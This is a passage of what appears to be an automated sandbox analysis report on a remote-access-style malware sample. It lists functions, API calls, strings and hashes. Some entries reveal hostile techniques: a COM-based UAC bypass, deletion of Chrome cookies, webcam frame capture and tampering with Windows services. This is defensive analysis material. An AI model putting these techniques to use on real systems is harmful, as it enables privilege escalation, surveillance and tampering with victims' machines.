                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C477
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandle$CreatePointerWrite
                                                                        • String ID: hpF
                                                                        • API String ID: 1852769593-151379673
                                                                        • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                        • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                                                        • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                        • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                                                        Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                                        • _free.LIBCMT ref: 00450F48
                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                        • _free.LIBCMT ref: 00450F53
                                                                        • _free.LIBCMT ref: 00450F5E
                                                                        • _free.LIBCMT ref: 00450FB2
                                                                        • _free.LIBCMT ref: 00450FBD
                                                                        • _free.LIBCMT ref: 00450FC8
                                                                        • _free.LIBCMT ref: 00450FD3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                        • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                        • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                                        Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                        • _free.LIBCMT ref: 100092AB
                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                        • _free.LIBCMT ref: 100092B6
                                                                        • _free.LIBCMT ref: 100092C1
                                                                        • _free.LIBCMT ref: 10009315
                                                                        • _free.LIBCMT ref: 10009320
                                                                        • _free.LIBCMT ref: 1000932B
                                                                        • _free.LIBCMT ref: 10009336
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                        • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                        • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                        • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                        Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                                        • int.LIBCPMT ref: 00411183
                                                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                        • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                        • String ID: (mG
                                                                        • API String ID: 2536120697-4059303827
                                                                        • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                                        • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                                                        • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                                        • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                                        Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                                        • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                        • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                                        • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                        • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                                        Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                                                                          • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                                          • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                        • CoUninitialize.OLE32 ref: 00407629
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InitializeObjectUninitialize_wcslen
                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                        • API String ID: 3851391207-1839356972
                                                                        • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                        • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                                        • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                        • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                                        Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                                                        • GetLastError.KERNEL32 ref: 0040BAE7
                                                                        Strings
                                                                        • [Chrome Cookies not found], xrefs: 0040BB01
                                                                        • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                                                        • UserProfile, xrefs: 0040BAAD
                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteErrorFileLast
                                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                        • API String ID: 2018770650-304995407
                                                                        • Opcode ID: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                                                                        • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                                                        • Opcode Fuzzy Hash: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                                                                        • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                                                        Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __allrem.LIBCMT ref: 0043AC69
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                                                        • __allrem.LIBCMT ref: 0043AC9C
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                                                        • __allrem.LIBCMT ref: 0043ACD1
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                        • String ID:
                                                                        • API String ID: 1992179935-0
                                                                        • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                        • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                                                        • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                        • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                                                        Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                                                          • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: H_prologSleep
                                                                        • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                        • API String ID: 3469354165-3054508432
                                                                        • Opcode ID: 2fdfd63980a66dc9589990656a3d546e0077080f775d45fe236281622e2144b7
                                                                        • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                                        • Opcode Fuzzy Hash: 2fdfd63980a66dc9589990656a3d546e0077080f775d45fe236281622e2144b7
                                                                        • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                                        Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __cftoe
                                                                        • String ID:
                                                                        • API String ID: 4189289331-0
                                                                        • Opcode ID: 9a4a9018df91bb80547d8cd227be064c11647db9cc7a9b7c485a3b8778a52ece
                                                                        • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                                        • Opcode Fuzzy Hash: 9a4a9018df91bb80547d8cd227be064c11647db9cc7a9b7c485a3b8778a52ece
                                                                        • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                                        Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _strlen.LIBCMT ref: 10001607
                                                                        • _strcat.LIBCMT ref: 1000161D
                                                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                        • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                        • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcatlstrlen$_strcat_strlen
                                                                        • String ID:
                                                                        • API String ID: 1922816806-0
                                                                        • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                        • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                        • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                        • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                        Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                        • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$AttributesFilelstrcat
                                                                        • String ID:
                                                                        • API String ID: 3594823470-0
                                                                        • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                        • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                        • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                        • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                        Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                        • String ID:
                                                                        • API String ID: 493672254-0
                                                                        • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                                        • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                                                        • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                                        • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                                                        Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                        • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                        • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                        • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                        • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                        Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                        • _free.LIBCMT ref: 0044824C
                                                                        • _free.LIBCMT ref: 00448274
                                                                        • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                        • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                        • _abort.LIBCMT ref: 00448293
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free$_abort
                                                                        • String ID:
                                                                        • API String ID: 3160817290-0
                                                                        • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                        • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                                        • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                        • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                                        Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                        • _free.LIBCMT ref: 10005B2D
                                                                        • _free.LIBCMT ref: 10005B55
                                                                        • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                        • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                        • _abort.LIBCMT ref: 10005B74
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free$_abort
                                                                        • String ID:
                                                                        • API String ID: 3160817290-0
                                                                        • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                        • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                        • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                        • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                        Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                        • String ID:
                                                                        • API String ID: 221034970-0
                                                                        • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                                        • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                                                        • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                                        • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
